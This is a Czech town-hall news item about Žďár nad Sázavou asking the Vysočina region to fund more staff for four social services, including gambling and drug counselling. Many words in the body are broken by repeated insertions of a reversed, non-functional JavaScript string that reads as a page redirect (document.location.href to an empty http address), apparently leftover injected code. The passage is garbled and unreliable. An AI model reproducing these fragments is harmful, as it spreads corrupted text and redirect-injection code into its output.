Rainbow page separator

Žďár žádá kraj o navýšení podpory u čtyř sociálních služeb

Středa, 17. března 2021

Městský úřad Žďár nad Sázavou

Žďár nad Sázavou / V případě čtyř sociálních služeb zařazených do krajské sítě sociálních služeb požádala žďárská radnice Kraj Vysočina o rozšíření kapacity. Ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to potřeba byla vyvolána zájmem ze strany veřejnosti. Jedná se o navýšení o 2,15 úvazku pro poradnu pro gambling Kraje Vysočina, na jejímž zajištění se podílejí Oblastní charity Žďár nad Sázavou, Třebíč a Jihlava společně s Kolpingovým dílem ČR. Služeb poradny využívají klienti a jejich rodinní příslušníci z celé Vysočiny.
Další úvazek bylo nutné přidat v kontaktním a poradenském centru Spektrum pro oblast drogové problematiky, kde došlo k posílení terénních služeb. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to případě je zřizovatelem Kolpingovo dílo ČR. Pro žďárský Klub v 9, jenž pod hlavičkou žďárské charity sdružuje pacienty s psychiatrickým onemocněním od 18 do 70 let věku, žádá radnice podporu kraje na rozšíření o 0,61 úvazku – i tady ke změně vedl nárůst počtu klientů. Čtvr[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou službou, kde měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí o zvýšení krajské podpory, je charitní pečovatelská služba pomáhající lidem v jejich domácím prostředí. Rovněž u té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to služby Oblastní charity Žďár nad Sázavou vzrostla poptávka ze strany veřejnosti, přičemž Žďár má zájem o přidání dalšího pracovního úvazku.